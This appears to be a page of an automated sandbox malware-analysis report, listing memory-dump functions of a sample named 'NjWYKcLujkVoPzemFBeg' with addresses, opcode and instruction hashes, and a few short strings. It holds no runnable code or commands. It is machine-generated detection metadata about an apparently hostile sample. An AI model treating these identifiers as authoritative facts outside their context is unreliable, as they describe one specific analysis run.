                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ed673a66f8e1301f58e1655deeeae3869af08fad6cca63fb2768e1a95aab717f
                                • Instruction ID: e63ed1f86feff0dcf3ce2f1eeadde26612cfb96a41406d65efa599ee041b7acb
                                • Opcode Fuzzy Hash: ed673a66f8e1301f58e1655deeeae3869af08fad6cca63fb2768e1a95aab717f
                                • Instruction Fuzzy Hash: 5801E87090895C8FDF98EF58C898BE8B7B0EBA8315F1401A9D40EE7291DA359AC1CB40
                                Function 00007FF848E60C50 Relevance: .0, Instructions: 39COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3395758060.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a177a93c6cc804b53832386baaf6e70dd8d93f97ced35697afec7039ee006b76
                                • Instruction ID: 35822857a29b173c53e7f0b3783d5374da0813350a98d78c665f97440d6bf3ee
                                • Opcode Fuzzy Hash: a177a93c6cc804b53832386baaf6e70dd8d93f97ced35697afec7039ee006b76
                                • Instruction Fuzzy Hash: 99017870D0D689AFE706FB7488501AC7FB0FF02344F5841E6D044EB292EA386A48CB45
                                Function 00007FF8492572BF Relevance: .0, Instructions: 38COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fe73cdf9c555ec4433d6df1bc3026d2a755cd543c4edef602cdc57545c2c0fdf
                                • Instruction ID: c08fb1716d2c1f56e5c65af1cdbdee9908458aee9ba3edb0f521a352a6e6c446
                                • Opcode Fuzzy Hash: fe73cdf9c555ec4433d6df1bc3026d2a755cd543c4edef602cdc57545c2c0fdf
                                • Instruction Fuzzy Hash: 93F05E32E08E6D8FE7A9AE6844182BDB6E1EB98350F004137D41DE7291CE645C454782
                                Function 00007FF8492515D2 Relevance: .0, Instructions: 37COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 971eff059830e24f176bef75d6e593e876256c5b00c1fe2ebb2602e465f99758
                                • Instruction ID: 0539f2689f3d03d78f16cca2171a2b2ecccca929fcca9fe7fe4edd6f2789960c
                                • Opcode Fuzzy Hash: 971eff059830e24f176bef75d6e593e876256c5b00c1fe2ebb2602e465f99758
                                • Instruction Fuzzy Hash: 45F0C27284D2C59FE322AF7088618D57FB4EF03268B1801F6D0A6C60E3CA6D9616C361
                                Function 00007FF848E744B0 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3395758060.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff848e70000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: efef6b91d712cbbf2de7f2e5dada67f0c82e87b4fdcf7c0cec0051956486cc95
                                • Instruction ID: 86d7837ffe40006428f43646a7021ddca0c8eba6911b96acef6842c135978782
                                • Opcode Fuzzy Hash: efef6b91d712cbbf2de7f2e5dada67f0c82e87b4fdcf7c0cec0051956486cc95
                                • Instruction Fuzzy Hash: BEF03A34E0D54B8FEB48EB98C4905FEB7B1FF44351F00463AD41AD6689EF3469408A84
                                Function 00007FF848E6526D Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3395758060.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction ID: 7be9a3577a42f7ade3e9d103fc1fc78cb953cf929383176af6965eed19fcb741
                                • Opcode Fuzzy Hash: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction Fuzzy Hash: C3E0E530E0D0168EF765BA98C0003BD22A5AF84390F950079D92DB72D6CE3ABC419648
                                Function 00007FF848E60B95 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3395758060.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c9a7ebac4dbcc1b492641d0918653c0b04b6c1be29c3e3837045c21b23b8b416
                                • Instruction ID: e208448bd1bb2ebfb66f2a53860c5a90da8d5f2f3a53bda66a14e7d049c7ec83
                                • Opcode Fuzzy Hash: c9a7ebac4dbcc1b492641d0918653c0b04b6c1be29c3e3837045c21b23b8b416
                                • Instruction Fuzzy Hash: 8AD0A73161D54A4FE745B778D8498547B90FB1F310BD920E1D00CC72A1D61458558701
                                Function 00007FF848E75AA0 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3395758060.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff848e70000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 410747b63c2202f6abfb277a37985b9d077ce7f12b4dc569ab617aed2fd2ffeb
                                • Instruction ID: 3bb4af86dbbed1f7fc742b4aad345dfb227f4170bfda323aebbb91c41d5e8778
                                • Opcode Fuzzy Hash: 410747b63c2202f6abfb277a37985b9d077ce7f12b4dc569ab617aed2fd2ffeb
                                • Instruction Fuzzy Hash: 42D0C930A649084FCB4CB72C889A96472D1EB69216BD940A9D00AC72A1EA6AD889C741
                                Function 00007FF84925BBAE Relevance: .0, Instructions: 17COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1d63dfa783fc59bf46bfe5078d09c3e28aee6e36ad82f2a80807b360e8a8005e
                                • Instruction ID: 1f88254b12a0477019bdb6943372ba2bdcd3ca3e389c50a29fe6627ea44e2ff4
                                • Opcode Fuzzy Hash: 1d63dfa783fc59bf46bfe5078d09c3e28aee6e36ad82f2a80807b360e8a8005e
                                • Instruction Fuzzy Hash: 79D05E61E0DC96DFF1A8EE284062374A1D2EF84BA0F4440B9E40EC22CBCD2828401682
                                Function 00007FF848E60D30 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3395758060.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction ID: df7516600ac512f399ea97404ec5dbcf3026a66fb6dca1ee6322c105892dbaf9
                                • Opcode Fuzzy Hash: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction Fuzzy Hash: 44E01734A0C60ADFE700FB54C4886AEB7A1FB91361F6082A5C401A7289DB78B684CB84
                                Function 00007FF848E74CA3 Relevance: .0, Instructions: 14COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3395758060.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff848e70000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c0c7d8910fa8edb013cf39d84e77962b63d23f5184028abda98529c5d3d5d0f8
                                • Instruction ID: 09beb40d210f3702283af389227b97d492ba2ad135f0f70f96ab1da1434d3b57
                                • Opcode Fuzzy Hash: c0c7d8910fa8edb013cf39d84e77962b63d23f5184028abda98529c5d3d5d0f8
                                • Instruction Fuzzy Hash: 85D0C930D0C5568FEA49BA08A941AAD33A1FF14389F104475ED4E931D7DF38B8528A59
                                Function 00007FF848E606A5 Relevance: .0, Instructions: 13COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3395758060.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction ID: 6ee8c76bf8097fd72ad07efc031bc94fead778ab448a0daf356bb140b92e30e4
                                • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction Fuzzy Hash: 1AC08C01D1E42F08F405B12E14020ACA2007BC42D0FD00032C01C700C29EAD30C5024E
                                Function 00007FF848E60B18 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3395758060.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b2b767db43ab861b6472bc43987cfc9b405dc4539c5e1ec182c4e5c5dd8ab7c4
                                • Instruction ID: 0a3ef425cd6a3e483cf6112a13b8b12f2255a7c9e939f80f6b9675df6606ad5d
                                • Opcode Fuzzy Hash: b2b767db43ab861b6472bc43987cfc9b405dc4539c5e1ec182c4e5c5dd8ab7c4
                                • Instruction Fuzzy Hash: BCC04C305158098FC954F72DC98595476A0FB0E215BD501D0E40DC7175E66AEC95C745
                                Function 00007FF848E612D8 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3395758060.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction ID: b82c5eda5274fd8e6e0b4412df162d49119f7d3ae3a4052fdd84645068683bd3
                                • Opcode Fuzzy Hash: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction Fuzzy Hash: E9C08C308108088FCA08FB28C88480433A0FB09200BD60090E009C7170E229ECD1C740
                                Function 00007FF84925BBA1 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 58be11b184ffdfb2d77cd866c61f0e51478a2a2492650f8a1a5a4e8943810d21
                                • Instruction ID: 58cd40caff5a3816364c5bf93a9df4bbffddae71d16077920f54ff747af9ce57
                                • Opcode Fuzzy Hash: 58be11b184ffdfb2d77cd866c61f0e51478a2a2492650f8a1a5a4e8943810d21
                                • Instruction Fuzzy Hash: B3D0123154C85ACFEBE8EF18C088D24B3E1FB6839032180A4E00BC72B4EE25EC50DB60
                                Function 00007FF849257DFB Relevance: .0, Instructions: 11COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7ae8881c529bbc24702387c938274a8b644464a0653162e3ac3c70faf1a1248d
                                • Instruction ID: af4fbf308c72e2ca679d5635168570b50cc838084d6e6c3f7f43caf00c9e0662
                                • Opcode Fuzzy Hash: 7ae8881c529bbc24702387c938274a8b644464a0653162e3ac3c70faf1a1248d
                                • Instruction Fuzzy Hash: A1D0C910A5D6F38EF13DBE01902133DD5999F853A0E60883DD4BF419C1CE5CBD416616
                                Function 00007FF849252DAB Relevance: .0, Instructions: 11COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 99ba0bec10a134ae20e15f211c33c7b2a498c96dca3d30da1805c38e7d595eca
                                • Instruction ID: e982d01046bcb179b2b15a96a5013eb8a68ab58d7cb4ecb303e62ab902f3bdf9
                                • Opcode Fuzzy Hash: 99ba0bec10a134ae20e15f211c33c7b2a498c96dca3d30da1805c38e7d595eca
                                • Instruction Fuzzy Hash: 85D0C920A0E6A38DF63D7E11806063ED1A49F003A0F64503DD17F619C1CD2D78416621
                                Function 00007FF848E635AD Relevance: .0, Instructions: 10COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3395758060.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e0ac2e656a23ef5ab2205f39fbdd144c8cc7d26f0e7105a7a3ffda27b0f22e08
                                • Instruction ID: 50c0122d8001b21d17128b31b404353ee54655b0db6ac7ba96c814b330d0d086
                                • Opcode Fuzzy Hash: e0ac2e656a23ef5ab2205f39fbdd144c8cc7d26f0e7105a7a3ffda27b0f22e08
                                • Instruction Fuzzy Hash: 9CC08C0AE0DC2A9AE29A221404202BE044ADF80788F885071E00E872CAEE1C2A0106CA
                                Function 00007FF84925D51B Relevance: .0, Instructions: 10COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b00050e7dbc80f6f461a1efcf1f201b8d62ee6b2af26a54fff33cd0811a5841f
                                • Instruction ID: 7825844d6612b39672f5113ca06a8988d09726fb6033f25aa4fd6010c9596ece
                                • Opcode Fuzzy Hash: b00050e7dbc80f6f461a1efcf1f201b8d62ee6b2af26a54fff33cd0811a5841f
                                • Instruction Fuzzy Hash: E2C08C14E6C3A78FF2312EB84C4143C92900F0B288B880B7AE22A9A2D3CA5838401331
                                Function 00007FF849257E0E Relevance: .0, Instructions: 9COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 62372e3e9f35309c2c8595fd9c1ce9b4ff8e1e9d72846af93b4475ad7815f4af
                                • Instruction ID: 5e68017309a35c2cce9c1fba585c88f7a18f13c24a3b891aa08867a3cbb0dc29
                                • Opcode Fuzzy Hash: 62372e3e9f35309c2c8595fd9c1ce9b4ff8e1e9d72846af93b4475ad7815f4af
                                • Instruction Fuzzy Hash: 87C08C2080C6938FF229AB15C02233577A0DF42390F2188B9C81E4A4E2CF697A919612
                                Function 00007FF848E606C8 Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3395758060.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction ID: 409f002d9ff6d1b62a327699d874886f2c8ca824da1e9b57baa0e6257bc20c7c
                                • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction Fuzzy Hash: 9EB01200C6E40F04E408317A08420A471407BC4180FC00070D40C70082999D3094034A
                                Function 00007FF84925730F Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 14e526f97d9b9bbbf9340748bf14b5e6235f9d6094792faa8e7ea19ae5673152
                                • Instruction ID: 33961068b399d2614c1f46633595e3ef82a36054288c5472c2792dfd90022734
                                • Opcode Fuzzy Hash: 14e526f97d9b9bbbf9340748bf14b5e6235f9d6094792faa8e7ea19ae5673152
                                • Instruction Fuzzy Hash: 63C09B80E4D3D35FF73535B40C9107D46C51F66390B950571D916451C3DD5CED055669
                                Function 00007FF8492522E1 Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2069fcaa1459917c8ce4bec65e995104d6cec1ba0ff28410a0ba66b315996799
                                • Instruction ID: b8e6513e57122953044ecb0febe219650e9fa59af4c306ddd1dcb2b4401245cb
                                • Opcode Fuzzy Hash: 2069fcaa1459917c8ce4bec65e995104d6cec1ba0ff28410a0ba66b315996799
                                • Instruction Fuzzy Hash: A0B01200F0C2538FF33034B0084507C40440B053D0F540530D23B893C7DD5C3C006312

                                Non-executed Functions

                                Function 00007FF849382DB1 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3405953523.00007FF849380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849380000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849380000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID: '$?$E$S
                                • API String ID: 0-1924212401
                                • Opcode ID: 554991cc976cb45abf5c23d639b019eead301a33cd5e8aeb08533283b5519197
                                • Instruction ID: 21f7986e9dba5feb719667767b3208e5950641c3468aad006e8c953b69e250b5
                                • Opcode Fuzzy Hash: 554991cc976cb45abf5c23d639b019eead301a33cd5e8aeb08533283b5519197
                                • Instruction Fuzzy Hash: 9A118E3090C9458FE6B9DA04D885BB573E1EB41340F20657DD8AF832C2EA38784A8A82

                                Executed Functions

                                Function 00007FF848E60D48 Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID: 5[_H
                                • API String ID: 0-3279724263
                                • Opcode ID: aa836ff1b36065d68d714cab29b02b0e3b1c543a4c69aca46f84022f0d94932e
                                • Instruction ID: cece362e6e88e41d047c1a2b21452528932da5618be01a61328bdd2ed791ae50
                                • Opcode Fuzzy Hash: aa836ff1b36065d68d714cab29b02b0e3b1c543a4c69aca46f84022f0d94932e
                                • Instruction Fuzzy Hash: BD910275D1CA998FE78DEB2898693A87FE0FF96354F4400BAC009E72D2DB792815C711
                                Function 00007FF848E60940 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID: cN_H
                                • API String ID: 0-938979074
                                • Opcode ID: 9b5cc2915a52d6de4833431345d01fdd92eeb36de237c949b925b6068769ca51
                                • Instruction ID: 72a413c12f533743fe24f46c066453f8dc312c3aafccc8df4e605e8bf24bcd3e
                                • Opcode Fuzzy Hash: 9b5cc2915a52d6de4833431345d01fdd92eeb36de237c949b925b6068769ca51
                                • Instruction Fuzzy Hash: 33511231A0CB048FE748EA1CA88667577E1FB99760F54057EE489C3296DA34FC428786
                                Function 00007FF848E60908 Relevance: .1, Instructions: 118COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction ID: 37afb7b7de429236c9309a40fd679e8c6199cf1b83da86fbf3563b7e9543fefc
                                • Opcode Fuzzy Hash: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction Fuzzy Hash: 4B21F83170CC194FD768EA1CE889DB973D1FF9932171101BAE58AC7165E921EC8287C5
                                Function 00007FF848E60998 Relevance: .1, Instructions: 96COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7d38f1cb0eee2cb5bb1a4419424c966ffeef8f3ffd092928d324916c31c23c6a
                                • Instruction ID: feb570d0e5d6d0ad52b7c2488080f4bc035a25710f48ccdf84b91e01a3564afa
                                • Opcode Fuzzy Hash: 7d38f1cb0eee2cb5bb1a4419424c966ffeef8f3ffd092928d324916c31c23c6a
                                • Instruction Fuzzy Hash: 69210321B1CD195FE788F72C905A67A7AC6FB99751F5100BAE40ED32E7DE28AC418284
                                Function 00007FF848E60C25 Relevance: .1, Instructions: 85COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d2042d6a2b2e4ac96eb315dd6492df7c656496712ca0a2df31a7fe5986b078fb
                                • Instruction ID: cabaf4b38a10aac514f4887f8a8af3a21fa75b27568df20a0691b3ddc5f7659f
                                • Opcode Fuzzy Hash: d2042d6a2b2e4ac96eb315dd6492df7c656496712ca0a2df31a7fe5986b078fb
                                • Instruction Fuzzy Hash: 0A210776E0C659AFE716B76898010EC7B60FF813A1F4885B3D048EA183DA38254AC799
                                Function 00007FF848E608F8 Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction ID: 73565adda20e5b8fff203e02000adb3a7bb74b322225c4c622252fa3794511cc
                                • Opcode Fuzzy Hash: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction Fuzzy Hash: 0E01FC31F0D92D0F9668E01D944A93973C2E7C6670B651279D84FD3285DE20BC5342C4
                                Function 00007FF848E66AC4 Relevance: .1, Instructions: 67COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c18aafe3cf2ed6de4d75e51ca9cf467c7fa4f537d0fbd315db497c660bbee12
                                • Instruction ID: 3894828b00cb758f85a04c1267a9f6b6cf02289f04622878c34a3bc27ecc975b
                                • Opcode Fuzzy Hash: 1c18aafe3cf2ed6de4d75e51ca9cf467c7fa4f537d0fbd315db497c660bbee12
                                • Instruction Fuzzy Hash: 80211B30D1852DCFDBA8EB04C495BAAB3A1FB58304F5441B9C01EA32A0CB75ADC08B45
                                Function 00007FF848E60C38 Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 222f69e95e87290fa681d7f997111d1671dd08bea6e36ac60dc52fe944f937e0
                                • Instruction ID: 64634479275d4f6f66de9e88cb07372cbc3c5c69db94aaefebf1d4728209f87d
                                • Opcode Fuzzy Hash: 222f69e95e87290fa681d7f997111d1671dd08bea6e36ac60dc52fe944f937e0
                                • Instruction Fuzzy Hash: 4B11E535E0C6999FE706FB3888501AC7FB0FF82391F5944B3C044FB192D6382A498794
                                Function 00007FF848E60C40 Relevance: .0, Instructions: 50COMMON
                                Download Yara Rule
                                Memory Dump Source
